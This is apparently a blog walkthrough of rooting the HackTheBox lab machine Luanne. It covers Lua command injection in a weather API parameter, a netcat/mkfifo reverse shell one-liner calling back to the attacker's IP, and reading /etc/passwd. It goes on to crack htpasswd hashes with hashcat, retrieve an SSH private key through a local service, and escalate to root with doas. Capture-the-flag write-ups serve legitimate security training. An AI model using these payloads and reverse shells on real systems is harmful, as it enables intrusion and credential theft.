Luanne HackTheBox WalkThrough

This is Luanne HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted to Luanne HTB machine. Before starting let us know something about this machine. It is a NetBSD box (which I came to know after I got into the box) with IP address 10.10.10.218 and difficulty easy assigned by its maker. First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Luanne machine by pinging its IP 10.10.10.218. If all goes correct then start hacking.

As usual, I started by scanning the machine. Used Nmap [a port scanner] for this task and this time I have used an additional nmap switch -O for finding the Operating System as we are not aware of its OS prior. The result is below-

Scanning

$ sudo nmap -sC -sV -O -oN launne.nmap 10.10.10.218

Nmap found port 22, 80 and 9001 as open. But it didn’t find the OS and even it didn’t guess its name. Anyway, we will find its name and version once we will be inside the box. For now let us enumerate on port 22, 80 and 9001. OpenSSH 8.0 is running on port 22 and its banner also revealed the Operating System name which is NetBSD. So here we came to know that OS of Luanne machine is NetBSD. SSH will be helpful once we get some credentials in further enumeration.

Let us dig deeper into different services of remaining ports. Nginx 1.19 web server is running on port 80 and Medusa 1.12 web server is running over port 9001. Since web servers are running over ports 80 and 9001 so we should have some websites running over URLs http://10.10.10.218 & http://10.10.10.218:9001. Ongoing to these URLs found login page on both of them like we have in tomcat web server. If you analyze nmap report deeply you will find that nmap script http-robots.txt revealed a folder weather at port 80 which can be accessed at URL http://10.10.10.218/weather/.

When I visited this URL it gave me 404 - Not Found error. Then I brute forced for files and folders using $dirsearch (a directory and file bruteforcer written in python) and wordlist directory-list-1.0.txt (this wordlist can be found at directory /usr/share/wordlists/dirbuster/ in Kali & Parrot)

Directory Bruteforcing

$ sudo dirsearch -u http://10.10.10.218/weather/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e all -t 40 | tee big.out

Directory bruteforcing revealed a file forecast. After accessing this file at URL http://10.10.10.218/weather/forecast got some message inside JSON format revealing a parameter city with its value list viz. city=list. When I accessed the URL got information about different cities.

After some enumeration and fuzzing got error revealing that this website is using Lua programming language. Check this URL for error http://10.10.10.218/weather/forecast?city=London‘.

Since it is using Lua language so I fuzzed the URL for some Lua strings and found that if we append ')os.execute("whoami") at the end of the URL http://10.10.10.218/weather/forecast?city=London it executes OS command on Luanne machine. I think this is the reason this machine is named Luanne because here we are able to execute code via Lua statement and Luanne also contains Lua word. Let us confirm OS command execution by checking /etc/passwd file of Luanne machine.

Confirming OS Command Execution

Open following URL in browser to confirm code execution on Luanne machine.

http://10.10.10.218/weather/forecast?city=London%27)os.execute(%22cat%20/etc/passwd%22)–

We have successfully confirmed remote code execution on Luanne machine. Let us get user shell on our local machine using one liner shellcode. I have used $nc one liner. You can found others at Pentestmonkey.

Getting User Shell

To get reverse shell first of all start netcat listener on your Kali machine and execute the following URL in the browser. You will get shell.

http://10.10.10.218/weather/forecast?city=London%27)os.execute(%22rm%20%2ftmp%2ff%3Bmkfifo%20%2ftmp%2ff%3Bcat%20%2ftmp%2ff%7C%2fbin%2fsh%20-i%202%3E%261%7Cnc%2010.10.14.9%201234%20%3E%2ftmp%2ff%22)–

$ rlwrap nc -nvlp 1234

$ whoami && id

We have got user shell as user _httpd. The home folder of this user i.e., current folder contains a hidden file .htpasswd. After listing the contents of this file found a password hash of user webapi_user.

$ ls -la

$ cat .htpasswd

webapi_user : $1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

Let us identify the type of this hash so that we can crack it using $hashcat (an offline password cracker).

$ hash-identifier

~$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

hash-identifier identified this hash as MD5 (Unix). Let us crack it using wordlist rockyou.txt. rockyou.txt file can be found inside the directory /usr/share/wordlists/ of Kali and Parrot OS.

Cracking Hash 1 using Hashcat

$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt

$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt --show

Hashcat has successfully cracked the hash and the cracked password is iamthebest. So we have the credential webapi_user:  iamthebest. When I tried to SSH using this credential it failed. After some enumeration found that port 3000 & 3001 are listening locally.

When tried to access service on port 3001 via the URL http://127.0.0.1:3001 got 401 unauthorized error. So used the credential webapi_user: iamthebest to access the service and found that we could easily logged in, and this time didn’t get any access denied permission.

$ curl http://127.0.0.1:3001

$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001

After some further enumeration got id_rsa key of user r.michaels inside its home folder using $curl command. This is somewhat different because normally id_rsa file is present inside the .ssh folder of user’s home directory and can be accessed by that user & root user only. But, here it can be accessed from a webserver running locally. So this file must be present inside some type of public_html folder. Don’t know exactly what is the folder name in which it is present until I pawned the box.

$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001/~r.michaels/id_rsa

We have got SSH private key. Let us SSH into Luanne machine using this key after changing its permission.

Getting User Shell using SSH

$ vi id_rsa

$ chmod 400 id_rsa

$ ssh -i id_rsa [email protected]

$ whoami && id

We are now logged in as user r.michaels. Let us capture user flag.

Capture User Flag

$ cat user.txt

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation. For this I ran linpeas.sh (a post exploitation enumeration script) but linpeas didn’t find any valid PrivEsc vector. So I started to do manual enumeration on the box. After spending some times on the box found an encrypted file devel_backup-2020-09-16.tar.gz.enc inside the directory /home/r.michaels/backups/. Didn’t know how to extract this file. If it would be .gz or .g2z we would use $tar tool to extract but it is .enc extension file. After some googling found tool $netpgp that can decrypt this file. Check this for more info.

Finding PrivEsc Vector

$ ls -la /home/r.michaels/backups/

To extract this file I simply copied this file into /tmp/ folder and extracted the file using the following command. When it asks for password enter the password iamthebest.

$ cd /tmp/

$ netpgp --decrypt /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc --output=devel_backup-2020-09-16.tar.gz

$ tar -xf devel_backup-2020-09-16.tar.gz

$ cat devel-2020-09-16/www/.htpasswd

After extracting this file found another hash of user webapi_user: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu. . It is again md5 (Unix) hash you can see the result of hash-identifier.

$ hash-identifier

~$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

After cracking this hash using hashcat I found the password littlebear. Then I tried to change the user to root using $doas command of NetBSD and I could easily login as root. So here our PrivEsc vector is Privilege Escalation using Credential Dumping.

Cracking Hash 2 using Hashcat

$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt

$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt --show

Let us change the user to root user using $doas command. $doas command in NetBSD is same as $sudo command in Linux OS. It executes command as other user. For more info check this link from FreeBSD.org.

$ doas -u root /bin/sh

~littlebear

# whoami && id

Capture Root Flag

Let us capture root flag.

# cat /root/root.txt

This was how I rooted to Luanne HackTheBox machine. Learnt a lot after rooting this box. Hope you have also learnt some new things from this box walkthrough. Thanks for reading this writeup. For any query and suggestion feel free to write us at [email protected].